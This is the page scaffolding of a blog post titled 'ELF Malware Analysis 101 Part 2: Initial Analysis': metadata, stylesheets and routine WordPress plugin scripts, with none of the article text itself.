<!DOCTYPE html>
<html lang="en-US">
<head>
	


    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="icon" type="image/png" href="https://149520725.v2.pressablecdn.com/wp-content/themes/intezer-v2/fav.png" />
     
     
	<meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />

	
	<title>ELF Malware Analysis 101: Initial Analysis - Intezer</title>
	<meta name="description" content="In this article we will pursue ELF file analysis with an emphasis on static analysis. The purpose of initial analysis is to gather as many insights about a file as possible without spending too much time on advanced analysis techniques." />
	<link rel="canonical" href="https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/" />
	<meta property="og:locale" content="en_US" />
	<meta property="og:type" content="article" />
	<meta property="og:description" content="In this article we will pursue ELF file analysis with an emphasis on static analysis. The purpose of initial analysis is to gather as many insights about a file as possible without spending too much time on advanced analysis techniques." />
	<meta property="og:url" content="https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/" />
	<meta property="og:site_name" content="Intezer" />
	<meta property="article:publisher" content="https://www.facebook.com/IntezerLabs/" />
	<meta property="article:published_time" content="2020-08-19T14:29:06+00:00" />
	<meta property="article:modified_time" content="2022-03-27T13:21:16+00:00" />
	<meta property="og:image" content="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/06/shutterstock_282380951-1.jpg" />
	<meta property="og:image:width" content="1024" />
	<meta property="og:image:height" content="512" />
	<meta property="og:image:type" content="image/jpeg" />
	<meta name="twitter:card" content="summary_large_image" />
	<meta name="twitter:creator" content="@IntezerLabs" />
	<meta name="twitter:site" content="@IntezerLabs" />
	<meta name="twitter:label1" content="Written by" />
	<meta name="twitter:data1" content="Avigayil Mechtinger" />
	<meta name="twitter:label2" content="Est. reading time" />
	<meta name="twitter:data2" content="25 minutes" />
	<script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://www.intezer.com/#organization","name":"Intezer","url":"https://www.intezer.com/","sameAs":["https://www.facebook.com/IntezerLabs/","https://www.linkedin.com/company/intezer-labs/","https://www.youtube.com/channel/UCt5L5ztHh-C1NCKa6bKjXFQ","https://twitter.com/IntezerLabs"],"logo":{"@type":"ImageObject","@id":"https://www.intezer.com/#logo","inLanguage":"en-US","url":"https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/05/cropped-intezer-blue-1.png","contentUrl":"https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/05/cropped-intezer-blue-1.png","width":512,"height":512,"caption":"Intezer"},"image":{"@id":"https://www.intezer.com/#logo"}},{"@type":"WebSite","@id":"https://www.intezer.com/#website","url":"https://www.intezer.com/","name":"Intezer","description":"","publisher":{"@id":"https://www.intezer.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.intezer.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"ImageObject","@id":"https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/#primaryimage","inLanguage":"en-US","url":"https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/06/shutterstock_282380951-1.jpg","contentUrl":"https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/06/shutterstock_282380951-1.jpg","width":1024,"height":512},{"@type":"WebPage","@id":"https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/#webpage","url":"https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/","name":"ELF Malware Analysis 101: Initial Analysis - 
Intezer","isPartOf":{"@id":"https://www.intezer.com/#website"},"primaryImageOfPage":{"@id":"https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/#primaryimage"},"datePublished":"2020-08-19T14:29:06+00:00","dateModified":"2022-03-27T13:21:16+00:00","description":"In this article we will pursue ELF file analysis with an emphasis on static analysis. The purpose of initial analysis is to gather as many insights about a file as possible without spending too much time on advanced analysis techniques.","breadcrumb":{"@id":"https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/"]}]},{"@type":"BreadcrumbList","@id":"https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://www.intezer.com/"},{"@type":"ListItem","position":2,"name":"ELF Malware Analysis 101 Part 2: Initial Analysis "}]},{"@type":"Article","@id":"https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/#article","isPartOf":{"@id":"https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/#webpage"},"author":{"@id":"https://www.intezer.com/#/schema/person/dcebd6e0f0881db68c1b2aad57a7f766"},"headline":"ELF Malware Analysis 101 Part 2: Initial Analysis 
","datePublished":"2020-08-19T14:29:06+00:00","dateModified":"2022-03-27T13:21:16+00:00","mainEntityOfPage":{"@id":"https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/#webpage"},"wordCount":4255,"publisher":{"@id":"https://www.intezer.com/#organization"},"image":{"@id":"https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/#primaryimage"},"thumbnailUrl":"https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/06/shutterstock_282380951-1.jpg","keywords":["Malware Analysis"],"articleSection":["Linux","Malware Analysis"],"inLanguage":"en-US"},{"@type":"Person","@id":"https://www.intezer.com/#/schema/person/dcebd6e0f0881db68c1b2aad57a7f766","name":"Avigayil Mechtinger","image":{"@type":"ImageObject","@id":"https://www.intezer.com/#personlogo","inLanguage":"en-US","url":"https://secure.gravatar.com/avatar/a58fa1c7c5adf29f1d0e392b4d1e7212?s=96&d=mm&r=g","contentUrl":"https://secure.gravatar.com/avatar/a58fa1c7c5adf29f1d0e392b4d1e7212?s=96&d=mm&r=g","caption":"Avigayil Mechtinger"},"url":"https://www.intezer.com/author/avigayil/"}]}</script>
	


<link rel='dns-prefetch' href='//static.addtoany.com' />
<link rel='dns-prefetch' href='//js.hs-scripts.com' />
<link rel='dns-prefetch' href='//www.google.com' />
<link rel='dns-prefetch' href='//c0.wp.com' />
<link href='https://fonts.gstatic.com' crossorigin rel='preconnect' />
<link rel="alternate" type="application/rss+xml" title="Intezer &raquo; Feed" href="https://www.intezer.com/feed/" />
<link rel='stylesheet' id='wp-block-library-css'  href='https://c0.wp.com/c/5.9.3/wp-includes/css/dist/block-library/style.min.css' media='all' />
<style id='wp-block-library-inline-css' type='text/css'>
.has-text-align-justify{text-align:justify;}
</style>
<link rel='stylesheet' id='prismatic-blocks-css'  href='https://149520725.v2.pressablecdn.com/wp-content/plugins/prismatic/css/styles-blocks.css?ver=69620a8ea322898ee44dac014d43fe0a' media='all' />
<link rel='stylesheet' id='mediaelement-css'  href='https://c0.wp.com/c/5.9.3/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css' media='all' />
<link rel='stylesheet' id='wp-mediaelement-css'  href='https://c0.wp.com/c/5.9.3/wp-includes/js/mediaelement/wp-mediaelement.min.css' media='all' />
<style id='global-styles-inline-css' type='text/css'>
body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: 
linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--duotone--dark-grayscale: url('#wp-duotone-dark-grayscale');--wp--preset--duotone--grayscale: url('#wp-duotone-grayscale');--wp--preset--duotone--purple-yellow: url('#wp-duotone-purple-yellow');--wp--preset--duotone--blue-red: url('#wp-duotone-blue-red');--wp--preset--duotone--midnight: url('#wp-duotone-midnight');--wp--preset--duotone--magenta-yellow: url('#wp-duotone-magenta-yellow');--wp--preset--duotone--purple-green: url('#wp-duotone-purple-green');--wp--preset--duotone--blue-orange: url('#wp-duotone-blue-orange');--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) 
!important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) 
!important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) 
!important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}
</style>
<link rel='stylesheet' id='contact-form-7-css'  href='https://149520725.v2.pressablecdn.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.5.6' media='all' />
<link rel='stylesheet' id='bootstrap_css-css'  href='https://149520725.v2.pressablecdn.com/wp-content/themes/intezer-v2/css/bootstrap.css?ver=69620a8ea322898ee44dac014d43fe0a' media='all' />
<link rel='stylesheet' id='fontawesome_css-css'  href='https://149520725.v2.pressablecdn.com/wp-content/themes/intezer-v2/css/font-awesome.min.css?ver=69620a8ea322898ee44dac014d43fe0a' media='all' />
<link rel='stylesheet' id='main_css-css'  href='https://149520725.v2.pressablecdn.com/wp-content/themes/intezer-v2/style.css?ver=1650349380' media='all' />
<link rel='stylesheet' id='wpdreams-asl-basic-css'  href='https://149520725.v2.pressablecdn.com/wp-content/plugins/ajax-search-lite/css/style.basic.css?ver=4.9.5' media='all' />
<link rel='stylesheet' id='wpdreams-ajaxsearchlite-css'  href='https://149520725.v2.pressablecdn.com/wp-content/plugins/ajax-search-lite/css/style-curvy-blue.css?ver=4.9.5' media='all' />
<link rel='stylesheet' id='slb_core-css'  href='https://149520725.v2.pressablecdn.com/wp-content/plugins/simple-lightbox/client/css/app.css?ver=2.8.1' media='all' />
<link rel='stylesheet' id='addtoany-css'  href='https://149520725.v2.pressablecdn.com/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.16' media='all' />
<link rel='stylesheet' id='cf7cf-style-css'  href='https://149520725.v2.pressablecdn.com/wp-content/plugins/cf7-conditional-fields/style.css?ver=2.1.2' media='all' />
<link   rel='preload' as='style' data-wpacu-preload-it-async='1' onload="this.onload=null;this.rel='stylesheet'" id='wpacu-preload-jetpack_css-css'  href='https://149520725.v2.pressablecdn.com/wp-content/plugins/jetpack/css/jetpack.css?ver=10.9-a.5' media='all' />






<link rel="https://api.w.org/" href="https://www.intezer.com/wp-json/" /><link rel="alternate" type="application/json" href="https://www.intezer.com/wp-json/wp/v2/posts/11599" />			
			
			
						
		<style type='text/css'>img#wpstats{display:none}</style>
					<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
				<link rel="preload" as="style" href="//fonts.googleapis.com/css?family=Open+Sans&display=swap" />
				<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Open+Sans&display=swap" media="all" />
							<style type="text/css">
				/* If html does not have either class, do not show lazy loaded images. */
				html:not( .jetpack-lazy-images-js-enabled ):not( .js ) .jetpack-lazy-image {
					display: none;
				}
			</style>
			
		                <style>
                    
					@font-face {
						font-family: 'aslsicons2';
						src: url('https://www.intezer.com/wp-content/plugins/ajax-search-lite/css/fonts/icons2.eot');
						src: url('https://www.intezer.com/wp-content/plugins/ajax-search-lite/css/fonts/icons2.eot?#iefix') format('embedded-opentype'),
							 url('https://149520725.v2.pressablecdn.com/wp-content/plugins/ajax-search-lite/css/fonts/icons2.woff2') format('woff2'),
							 url('https://www.intezer.com/wp-content/plugins/ajax-search-lite/css/fonts/icons2.woff') format('woff'),
							 url('https://www.intezer.com/wp-content/plugins/ajax-search-lite/css/fonts/icons2.ttf') format('truetype'),
							 url('https://www.intezer.com/wp-content/plugins/ajax-search-lite/css/fonts/icons2.svg#icons') format('svg');
						font-weight: normal;
						font-style: normal;
					 font-display:swap;}
					div[id*='ajaxsearchlitesettings'].searchsettings .asl_option_inner label {
						font-size: 0px !important;
						color: rgba(0, 0, 0, 0);
					}
					div[id*='ajaxsearchlitesettings'].searchsettings .asl_option_inner label:after {
						font-size: 11px !important;
						position: absolute;
						top: 0;
						left: 0;
						z-index: 1;
					}
					div[id*='ajaxsearchlite'].wpdreams_asl_container {
						width: 100%;
						margin: 0px 0px 14px 0px;
					}
					div[id*='ajaxsearchliteres'].wpdreams_asl_results div.resdrg span.highlighted {
						font-weight: bold;
						color: rgba(48, 138, 255, 1);
						background-color: rgb(255, 255, 255);
					}
					div[id*='ajaxsearchliteres'].wpdreams_asl_results .results div.asl_image {
						width: 84px;
						height: 60px;
						background-size: cover;
						background-repeat: no-repeat;
					}
					div.asl_r .results {
						max-height: none;
					}
				
						.asl_m .probox svg {
							fill: rgba(204, 216, 228, 1) !important;
						}
						.asl_m .probox .innericon {
							background-color: rgba(255, 255, 255, 1) !important;
							background-image: none !important;
							-webkit-background-image: none !important;
							-ms-background-image: none !important;
						}
					
						div.asl_m.asl_w {
							border:1px solid rgba(48, 138, 255, 1) !important;border-radius:7px 7px 7px 7px !important;
							box-shadow: none !important;
						}
						div.asl_m.asl_w .probox {border: none !important;}
					
						div.asl_r.asl_w.vertical .results .item::after {
							display: block;
							position: absolute;
							bottom: 0;
							content: '';
							height: 1px;
							width: 100%;
							background: #D8D8D8;
						}
						div.asl_r.asl_w.vertical .results .item.asl_last_item::after {
							display: none;
						}
					 div.asl_m.asl_w {
    margin: auto;
    max-width: 820px;
}
div.asl_w .probox .promagnifier {
    order: 1;
}
div.asl_r .results .item .asl_content h3, div.asl_r .results .item .asl_content h3 a {
    font-weight: 600;
    color: #233b52;
}

div.asl_r .results .item .asl_content h3 a:hover {
    font-weight: 600;
    color: #233b52;
}

.wpdreams_asl_results .results div.asl_image {
    border-radius: 7px;
}

p.asl_desc {
    color: #849eb5;
}
span.asl_nores_header {
    font-size: 14px;
}                </style>
                			
            <link rel="icon" href="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/05/cropped-intezer-blue-1-32x32.png" sizes="32x32" />
<link rel="icon" href="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/05/cropped-intezer-blue-1-192x192.png" sizes="192x192" />
<link rel="apple-touch-icon" href="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/05/cropped-intezer-blue-1-180x180.png" />
<meta name="msapplication-TileImage" content="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/05/cropped-intezer-blue-1-270x270.png" />
<link rel="stylesheet" type="text/css" id="wp-custom-css" href="https://www.intezer.com/?custom-css=79c8f516d6" />



</head>

<body class="post-template-default single single-post postid-11599 single-format-standard wp-custom-logo elf-malware-analysis-101-initial-analysis elementor-default elementor-kit-8921">
<script type='text/javascript' id='media-video-jwt-bridge-js-extra'>
/* <![CDATA[ */
// Endpoints handed to the VideoPress token-bridge script that is loaded
// immediately after this block: the WordPress admin-ajax URL and the bridge
// script's own URL. Both are same-origin, server-rendered values.
var videopressAjax = {};
videopressAjax.ajaxUrl = "https:\/\/www.intezer.com\/wp-admin\/admin-ajax.php";
videopressAjax.bridgeUrl = "https:\/\/www.intezer.com\/wp-content\/plugins\/jetpack\/modules\/videopress\/js\/videopress-token-bridge.js";
/* ]]> */
</script>
<script   type='text/javascript' src='https://149520725.v2.pressablecdn.com/wp-content/plugins/jetpack/modules/videopress/js/videopress-token-bridge.js?ver=6' id='media-video-jwt-bridge-js'></script>
<script   type='text/javascript' id='addtoany-core-js-before'>
// AddToAny share-menu bootstrap: reuse an existing window.a2a_config if one is
// present and reset its callback / overlay / template registries to empty.
(function (shareConfig) {
	shareConfig.callbacks = [];
	shareConfig.overlays = [];
	shareConfig.templates = {};
})(window.a2a_config = window.a2a_config || {});
</script>
<script   type='text/javascript' async src='https://static.addtoany.com/menu/page.js' id='addtoany-core-js'></script>
<script   type='text/javascript' src='https://149520725.v2.pressablecdn.com/wp-content/themes/intezer-v2/js/jquery-3.2.1.min.js?ver=69620a8ea322898ee44dac014d43fe0a' id='jquery-js'></script>
<script   data-wpacu-apply-media-query='screen and (min-width: 1024px)' type='text/javascript' async wpacu-addtoany-jquery-src='https://149520725.v2.pressablecdn.com/wp-content/plugins/add-to-any/addtoany.min.js?ver=1.1' id='addtoany-jquery-js'></script>
<script>
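// Lazily enables the AddToAny <script> tag once the viewport is at least
// 1024px wide. The tag is emitted with its URL parked in a
// "wpacu-addtoany-jquery-src" attribute; copying that value into "src" is what
// actually starts the download. The URL is server-rendered page markup, not
// user input.
//
// @param {MediaQueryList|{matches: boolean}} wpacu_addtoany_jquery_match_media_var
//   current media-query state (also what a matchMedia listener receives).
function wpacu_addtoany_jquery_match_media(wpacu_addtoany_jquery_match_media_var) {
    if (!wpacu_addtoany_jquery_match_media_var || !wpacu_addtoany_jquery_match_media_var.matches) {
        return;
    }
    // Guard the lookup: the previous version indexed [0] unconditionally and
    // threw a TypeError when the tag was absent (e.g. the script is dequeued).
    var wpacuScriptTag = document.querySelectorAll("[wpacu-addtoany-jquery-src]")[0];
    if (!wpacuScriptTag) {
        return;
    }
    var wpacuSrcAttr = wpacuScriptTag.getAttribute('wpacu-addtoany-jquery-src');
    // An empty/missing URL would otherwise become src="null" and request a bogus path.
    if (wpacuSrcAttr) {
        wpacuScriptTag.setAttribute('src', wpacuSrcAttr);
    }
}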
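// Wire the loader to viewport width: apply the current state once, then
// re-apply whenever the query flips (addListener is the legacy form of
// MediaQueryList.addEventListener and is what the original relied on).
try {
    var wpacu_addtoany_jquery_match_media_var = window.matchMedia("screen and (min-width: 1024px)");
    wpacu_addtoany_jquery_match_media(wpacu_addtoany_jquery_match_media_var);
    wpacu_addtoany_jquery_match_media_var.addListener(wpacu_addtoany_jquery_match_media);
}
catch (wpacuError) {
    // Fallback when matchMedia is unavailable: load the script unconditionally.
    // The previous fallback wrote the URL into "href", which a <script> element
    // ignores, so the widget silently never loaded on this path; "src" is the
    // attribute that actually starts the request. Also guard the lookup so a
    // missing tag does not turn the fallback into an uncaught TypeError.
    var wpacuFallbackTag = document.querySelectorAll("[wpacu-addtoany-jquery-src]")[0];
    if (wpacuFallbackTag) {
        var wpacuHrefAttr = wpacuFallbackTag.getAttribute('wpacu-addtoany-jquery-src');
        if (wpacuHrefAttr) {
            wpacuFallbackTag.setAttribute('src', wpacuHrefAttr);
        }
    }
}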
</script>
<script>
				(function() {
					var hbspt = window.hbspt = window.hbspt || {};
					hbspt.forms = hbspt.forms || {};
					hbspt._wpFormsQueue = [];
					hbspt.enqueueForm = function(formDef) {
						if (hbspt.forms && hbspt.forms.create) {
							hbspt.forms.create(formDef);
						} else {
							hbspt._wpFormsQueue.push(formDef);
						}
					};
					if (!window.hbspt.forms.create) {
						Object.defineProperty(window.hbspt.forms, 'create', {
							configurable: true,
							get: function() {
								return hbspt._wpCreateForm;
							},
							set: function(value) {
								hbspt._wpCreateForm = value;
								while (hbspt._wpFormsQueue.length) {
									var formDef = hbspt._wpFormsQueue.shift();
									if (!document.currentScript) {
										var formScriptId = 'leadin-forms-v2-js';
										hubspot.utils.currentScript = document.getElementById(formScriptId);
									}
									hbspt._wpCreateForm.call(hbspt.forms, formDef);
								}
							},
						});
					}
				})();
			</script>
<script>
				// Flag the document as JS-enabled for Jetpack lazy images: the inline
				// stylesheet in <head> hides .jetpack-lazy-image while <html> carries
				// neither this class nor "js".
				(function (htmlRoot) {
					htmlRoot.classList.add('jetpack-lazy-images-js-enabled');
				})(document.documentElement);
			</script>
<script type="text/javascript">
                // Boot Ajax Search Lite only when its global object exists and exposes
                // initialize(); an undefined or null _ASL is silently skipped.
                (function (searchLib) {
                    if (searchLib !== null && typeof searchLib.initialize !== "undefined") {
                        searchLib.initialize();
                    }
                })(typeof _ASL !== "undefined" ? _ASL : null);
            </script>
<script id="wpacu-preload-async-css-fallback">
/*! LoadCSS. [c]2020 Filament Group, Inc. MIT License */
/* Standalone async-CSS workflow (WP Asset CleanUp build of loadCSS):
 * - tests support for link[rel=preload]
 * - loads CSS asynchronously in browsers that lack rel=preload
 * - switches a preloaded sheet to rel=stylesheet once it has arrived.
 *
 * Exposes wpacuLoadCSS(href, before, media, attributes) on `exports` when a
 * CommonJS environment is detected, otherwise on the global object.
 */
(function (root) {
	"use strict";

	// Insert a <link rel="stylesheet"> for `href` without blocking rendering.
	// @param href        stylesheet URL; written straight into link.href, so callers
	//                    must only pass URLs they trust
	// @param before      optional node to insert the link before; by default the link
	//                    goes after the last child of <body> (or of <head> if <body>
	//                    has not been parsed yet)
	// @param media       media query applied once the sheet is loaded; default "all"
	// @param attributes  optional plain object whose own properties are copied
	//                    verbatim onto the link before rel/href/media are set
	// @returns the created <link> element
	var wpacuLoadCSS = function (href, before, media, attributes) {
		var doc = root.document;
		var link = doc.createElement('link');
		var anchor;
		if (before) {
			anchor = before;
		} else {
			var siblings = (doc.body || doc.getElementsByTagName('head')[0]).childNodes;
			anchor = siblings[siblings.length - 1];
		}
		var sheets = doc.styleSheets;
		if (attributes) {
			for (var attrName in attributes) {
				if (attributes.hasOwnProperty(attrName)) {
					link.setAttribute(attrName, attributes[attrName]);
				}
			}
		}
		link.rel = "stylesheet";
		link.href = href;
		// A media query that never matches: the browser fetches the sheet but does
		// not block rendering on it until loadCB restores the real media value.
		link.media = "only x";

		// Run `cb` once <body> exists so the insertion point is stable.
		function ready(cb) {
			if (doc.body) {
				return cb();
			}
			setTimeout(function () {
				ready(cb);
			});
		}
		ready(function () {
			anchor.parentNode.insertBefore(link, (before ? anchor : anchor.nextSibling));
		});

		// Poll document.styleSheets until this sheet is registered, then run `cb`.
		var onwpaculoadcssdefined = function (cb) {
			var resolvedHref = link.href;
			var idx = sheets.length;
			while (idx--) {
				if (sheets[idx].href === resolvedHref) {
					return cb();
				}
			}
			setTimeout(function () {
				onwpaculoadcssdefined(cb);
			});
		};

		// Apply the caller's media query once the sheet is available.
		function loadCB() {
			if (link.addEventListener) {
				link.removeEventListener("load", loadCB);
			}
			link.media = media || "all";
		}
		if (link.addEventListener) {
			link.addEventListener("load", loadCB);
		}
		link.onwpaculoadcssdefined = onwpaculoadcssdefined;
		onwpaculoadcssdefined(loadCB);
		return link;
	};

	if (typeof exports !== "undefined") {
		exports.wpacuLoadCSS = wpacuLoadCSS;
	} else {
		root.wpacuLoadCSS = wpacuLoadCSS;
	}
}(typeof global !== "undefined" ? global : this));
</script>




<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "Article",
  "mainEntityOfPage": {
    "@type": "WebPage",
    "@id": "https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/"
  },
  "headline": "ELF Malware Analysis 101 Part 2: Initial Analysis",
  "image": "https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/06/shutterstock_282380951-1-1024x475.jpg",  
  "author": {
    "@type": "Organization",
    "name": "Intezer"
  },  
  "publisher": {
    "@type": "Organization",
    "name": "Intezer",
    "logo": {
      "@type": "ImageObject",
      "url": "https://149520725.v2.pressablecdn.com/wp-content/uploads/2019/02/Round-Logo-60x60.jpg",
      "width": 50,
      "height": 50
    }
  },
  "datePublished": "2020-08-19"
}
</script>





	<div id="primary" class="content-area">
	    <div class="container">
		    <div class="single-post-page">
